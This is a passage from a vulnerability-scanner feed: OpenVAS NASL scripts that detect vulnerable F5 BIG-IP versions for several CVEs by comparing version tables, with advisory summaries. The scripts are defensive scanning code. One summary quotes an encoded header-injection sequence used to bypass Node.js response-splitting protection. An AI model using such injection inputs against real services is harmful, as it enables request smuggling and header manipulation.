See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140155\");\n script_cve_id(\"CVE-2016-9244\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - F5 TLS vulnerability CVE-2016-9244\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/csp/article/K05121675\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"A BIG-IP SSL virtual server with the non-default Session Tickets option\n enabled may leak up to 31 bytes of uninitialized memory.\");\n\n script_tag(name:\"impact\", value:\"A BIG-IP virtual server configured with a Client SSL profile that has the\n non-default Session Tickets option enabled may leak up to 31 bytes of uninitialized memory. A remote attacker\n may exploit this vulnerability to obtain Secure Sockets Layer (SSL) session IDs from other sessions. 
It is\n possible that other data from uninitialized memory may be returned as well.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-02-09 09:58:08 +0100 (Thu, 09 Feb 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;11.5.4_HF3;11.2.1;' );\n\ncheck_f5['AAM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;11.5.4_HF3;' );\n\ncheck_f5['AFM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;11.5.4_HF3;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;11.5.4_HF3;11.2.1;' );\n\ncheck_f5['APM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;11.5.4_HF3;11.2.1;' );\n\ncheck_f5['ASM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;11.5.4_HF3;11.2.1;' );\n\ncheck_f5['LC'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.2_HF1;11.6.1_HF2;11.5.4_HF3;11.2.1;' );\n\ncheck_f5['PEM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', 
'13.0.0;12.1.2_HF1;11.6.1_HF2;11.5.4_HF3;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-07T18:30:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2216", "CVE-2016-9244"], "description": "The HTTP header parsing code in Node.js 0.10.x before 0.10.42, 0.11.6 through 0.11.16, 0.12.x before 0.12.10, 4.x before 4.3.0, and 5.x before 5.6.0 allows remote attackers to bypass an HTTP response-splitting protection mechanism via UTF-8 encoded Unicode characters in the HTTP header, as demonstrated by %c4%8d%c4%8a.", "modified": "2020-04-03T00:00:00", "published": "2017-03-22T00:00:00", "id": "OPENVAS:1361412562310140205", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140205", "type": "openvas", "title": "F5 BIG-IP - Article: K23134279 - Node.js vulnerability CVE-2016-2216", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - Article: K23134279 - Node.js vulnerability CVE-2016-2216\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140205\");\n script_cve_id(\"CVE-2016-2216\", \"CVE-2016-9244\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - Article: K23134279 - Node.js vulnerability CVE-2016-2216\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/csp/article/K23134279\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"The HTTP header parsing code in Node.js 0.10.x before 0.10.42, 0.11.6 through 0.11.16, 0.12.x before 0.12.10, 4.x before 4.3.0, and 5.x before 5.6.0 allows remote attackers to bypass an HTTP response-splitting protection mechanism via UTF-8 encoded Unicode characters in the HTTP header, as demonstrated by %c4%8d%c4%8a.\");\n\n script_tag(name:\"impact\", value:\"This vulnerability may allow a remote attacker to bypass an HTTP response-splitting protection mechanism.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-22 09:40:01 +0100 (Wed, 22 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n 
script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '12.0.0-12.1.2;11.6.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.3;11.6.2;11.4.0-11.5.4;11.2.1;' );\n\ncheck_f5['AAM'] = make_array( 'affected', '12.0.0-12.1.2;11.6.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.3;11.6.2;11.4.0-11.5.4;11.2.1;' );\n\ncheck_f5['AFM'] = make_array( 'affected', '12.0.0-12.1.2;11.6.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.3;11.6.2;11.4.0-11.5.4;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '12.0.0-12.1.2;11.6.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.3;11.6.2;11.4.0-11.5.4;11.2.1;' );\n\ncheck_f5['APM'] = make_array( 'affected', '12.0.0-12.1.2;11.6.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.3;11.6.2;11.4.0-11.5.4;11.2.1;' );\n\ncheck_f5['ASM'] = make_array( 'affected', '12.0.0-12.1.2;11.6.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.3;11.6.2;11.4.0-11.5.4;11.2.1;' );\n\ncheck_f5['GTM'] = make_array( 'affected', '11.6.0-11.6.1;',\n 'unaffected', '11.6.2;11.4.0-11.5.4;11.2.1;' );\n\ncheck_f5['LC'] = make_array( 'affected', '12.0.0-12.1.2;11.6.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.3;11.6.2;11.4.0-11.5.4;11.2.1;' );\n\ncheck_f5['PEM'] = make_array( 'affected', '12.0.0-12.1.2;11.6.0-11.6.1;',\n 'unaffected', '13.0.0;12.1.3;11.6.2;11.4.0-11.5.4;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-07T18:25:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5073", "CVE-2016-9244"], "description": "Heap-based buffer overflow in the 
find_fixedlength function in pcre_compile.c in PCRE before 8.38 allows remote attackers to cause a denial of service (crash) or obtain sensitive information from heap memory and possibly bypass the ASLR protection mechanism via a crafted regular expression with an excess closing parenthesis.", "modified": "2020-04-03T00:00:00", "published": "2017-03-07T00:00:00", "id": "OPENVAS:1361412562310140179", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140179", "type": "openvas", "title": "F5 BIG-IP - PCRE library vulnerability CVE-2015-5073", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - PCRE library vulnerability CVE-2015-5073\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140179\");\n script_cve_id(\"CVE-2015-5073\", \"CVE-2016-9244\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - PCRE library vulnerability CVE-2015-5073\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/csp/article/K17331\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Heap-based buffer overflow in the find_fixedlength function in pcre_compile.c in PCRE before 8.38 allows remote attackers to cause a denial of service (crash) or obtain sensitive information from heap memory and possibly bypass the ASLR protection mechanism via a crafted regular expression with an excess closing parenthesis.\");\n\n script_tag(name:\"impact\", value:\"A local, authenticated attacker may be able to provide malicious input in the configuration to exploit this vulnerability. 
There is no data plane exposure to this issue.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-07 10:27:32 +0100 (Tue, 07 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '12.0.0-12.1.2;11.0.0-11.6.1;10.1.0-10.2.4;',\n 'unaffected', '13.0.0;' );\n\ncheck_f5['AAM'] = make_array( 'affected', '12.0.0-12.1.2;11.4.0-11.6.1;',\n 'unaffected', '13.0.0;' );\n\ncheck_f5['AFM'] = make_array( 'affected', '12.0.0-12.1.2;11.3.0-11.6.1;',\n 'unaffected', '13.0.0;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '12.0.0-12.1.2;11.0.0-11.6.1;',\n 'unaffected', '13.0.0;' );\n\ncheck_f5['APM'] = make_array( 'affected', '12.0.0-12.1.2;11.0.0-11.6.1;10.1.0-10.2.4;',\n 'unaffected', '13.0.0;' );\n\ncheck_f5['ASM'] = make_array( 'affected', '12.0.0-12.1.2;11.0.0-11.6.1;10.1.0-10.2.4;',\n 'unaffected', '13.0.0;' );\n\ncheck_f5['LC'] = make_array( 'affected', '12.0.0;11.0.0-11.6.1;10.1.0-10.2.4;',\n 'unaffected', '13.0.0;' );\n\ncheck_f5['PEM'] = make_array( 'affected', '12.0.0-12.1.2;11.3.0-11.6.1;',\n 'unaffected', '13.0.0;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2020-04-07T18:26:17", 
"bulletinFamily": "scanner", "cvelist": ["CVE-2015-8806", "CVE-2016-9244"], "description": "dict.c in libxml2 allows remote attackers to cause a denial of service (heap-based buffer over-read and application crash) via an unexpected character immediately after the '<!DOCTYPE html' substring in a crafted HTML document.", "modified": "2020-04-03T00:00:00", "published": "2017-03-17T00:00:00", "id": "OPENVAS:1361412562310140193", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140193", "type": "openvas", "title": "F5 BIG-IP - libxml2 vulnerability CVE-2015-8806", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - libxml2 vulnerability CVE-2015-8806\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140193\");\n script_cve_id(\"CVE-2015-8806\", \"CVE-2016-9244\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - libxml2 vulnerability CVE-2015-8806\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/csp/article/K04450715\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"dict.c in libxml2 allows remote attackers to cause a denial of service (heap-based buffer over-read and application crash) via an unexpected character immediately after the '<!DOCTYPE html' substring in a crafted HTML document.\");\n\n script_tag(name:\"impact\", value:\"This vulnerability allows disruption of service.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-17 10:24:10 +0100 (Fri, 17 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", 
\"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '12.1.2;' );\n\ncheck_f5['AAM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;',\n 'unaffected', '12.1.2;' );\n\ncheck_f5['AFM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;',\n 'unaffected', '12.1.2;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '12.1.2;' );\n\ncheck_f5['APM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '12.1.2;' );\n\ncheck_f5['ASM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '12.1.2;' );\n\ncheck_f5['LC'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;11.2.1;',\n 'unaffected', '12.1.2;' );\n\ncheck_f5['PEM'] = make_array( 'affected', '12.0.0-12.1.1;11.4.0-11.6.1;',\n 'unaffected', '12.1.2;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-07T18:31:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6249", "CVE-2016-9244"], "description": "BIG-IP REST requests which timeout during user account authentication may log sensitive attributes such as password in plaintext to /var/log/restjavad.0.log.", "modified": "2020-04-03T00:00:00", "published": "2017-02-21T00:00:00", "id": "OPENVAS:1361412562310140169", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140169", "type": "openvas", "title": "F5 BIG-IP - REST vulnerability CVE-2016-6249", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 
BIG-IP - REST vulnerability CVE-2016-6249\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140169\");\n script_cve_id(\"CVE-2016-6249\", \"CVE-2016-9244\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - REST vulnerability CVE-2016-6249\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/csp/article/K12685114\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"BIG-IP REST requests which timeout during user account authentication may log sensitive attributes such as password in plaintext to /var/log/restjavad.0.log.\");\n\n script_tag(name:\"impact\", value:\"An attacker may be able to gain access to sensitive information.\");\n script_tag(name:\"qod_type\", 
value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-02-21 11:12:28 +0100 (Tue, 21 Feb 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '12.0.0;11.5.0-11.6.1;',\n 'unaffected', '12.1.0-12.1.2;12.0.0_HF4;11.6.1_HF2;11.6.0_HF8;11.5.4_HF3;11.4.1;11.2.1;' );\n\ncheck_f5['AAM'] = make_array( 'affected', '12.0.0;11.5.0-11.6.1;',\n 'unaffected', '12.1.0-12.1.2;12.0.0_HF4;11.6.1_HF2;11.6.0_HF8;11.5.4_HF3;11.4.1;' );\n\ncheck_f5['AFM'] = make_array( 'affected', '12.0.0;11.5.0-11.6.1;',\n 'unaffected', '12.1.0-12.1.2;12.0.0_HF4;11.6.1_HF2;11.6.0_HF8;11.5.4_HF3;11.4.1;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '12.0.0;11.5.0-11.6.1;',\n 'unaffected', '12.1.0-12.1.2;12.0.0_HF4;11.6.1_HF2;11.6.0_HF8;11.5.4_HF3;11.4.1;11.2.1;' );\n\ncheck_f5['APM'] = make_array( 'affected', '12.0.0;11.5.0-11.6.1;',\n 'unaffected', '12.1.0-12.1.2;12.0.0_HF4;11.6.1_HF2;11.6.0_HF8;11.5.4_HF3;11.4.1;11.2.1;' );\n\ncheck_f5['ASM'] = make_array( 'affected', '12.0.0;11.5.0-11.6.1;',\n 'unaffected', '12.1.0-12.1.2;12.0.0_HF4;11.6.1_HF2;11.6.0_HF8;11.5.4_HF3;11.4.1;11.2.1;' );\n\ncheck_f5['GTM'] = make_array( 'affected', '11.5.0-11.6.1;',\n 'unaffected', '11.6.1_HF2;11.6.0_HF8;11.5.4_HF3;11.4.1;11.2.1;' );\n\ncheck_f5['LC'] = make_array( 'affected', '12.0.0;11.5.0-11.6.1;',\n 'unaffected', 
'12.1.0-12.1.2;11.6.1_HF2;11.6.0_HF8;11.5.4_HF3;11.4.1;11.2.1;' );\n\ncheck_f5['PEM'] = make_array( 'affected', '12.0.0;11.5.0-11.6.1;',\n 'unaffected', '12.1.0-12.1.2;11.6.1_HF2;11.6.0_HF8;11.5.4_HF3;11.4.1;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-07T18:27:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7467", "CVE-2016-9244"], "description": "Traffic may be disrupted or failover initiated when a malformed, signed SAML authentication request from an authenticated user is sent via SP connector on a BIG-IP configured as a SAML Identity Provider.", "modified": "2020-04-03T00:00:00", "published": "2017-03-27T00:00:00", "id": "OPENVAS:1361412562310140223", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140223", "type": "openvas", "title": "F5 BIG-IP - TMM SSO plugin vulnerability CVE-2016-7467", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - TMM SSO plugin vulnerability CVE-2016-7467\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140223\");\n script_cve_id(\"CVE-2016-7467\", \"CVE-2016-9244\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - TMM SSO plugin vulnerability CVE-2016-7467\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/csp/article/K95444512\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Traffic may be disrupted or failover initiated when a malformed, signed SAML authentication request from an authenticated user is sent via SP connector on a BIG-IP configured as a SAML Identity Provider.\");\n\n script_tag(name:\"impact\", value:\"When the system is exploited, traffic is temporarily disrupted while services restart.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-03-27 12:44:20 +0200 (Mon, 27 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", 
\"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['APM'] = make_array( 'affected', '12.0.0-12.1.1;11.6.0-11.6.1_HF1;11.5.4-11.5.4_HF2;',\n 'unaffected', '12.1.2;11.6.1_HF2;11.5.4_HF3;11.4.0-11.5.3;11.2.1;10.2.1-10.2.4;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-07T18:33:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2182", "CVE-2016-9244"], "description": "The BN_bn2dec function in crypto/bn/bn_print.c in OpenSSL before 1.1.0 does not properly validate division results, which allows remote attackers to cause a denial of service (out-of-bounds write and application crash) or possibly have unspecified other impact via unknown vectors.", "modified": "2020-04-03T00:00:00", "published": "2017-03-17T00:00:00", "id": "OPENVAS:1361412562310140192", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140192", "type": "openvas", "title": "F5 BIG-IP - OpenSSL vulnerability CVE-2016-2182", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - OpenSSL vulnerability CVE-2016-2182\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# 
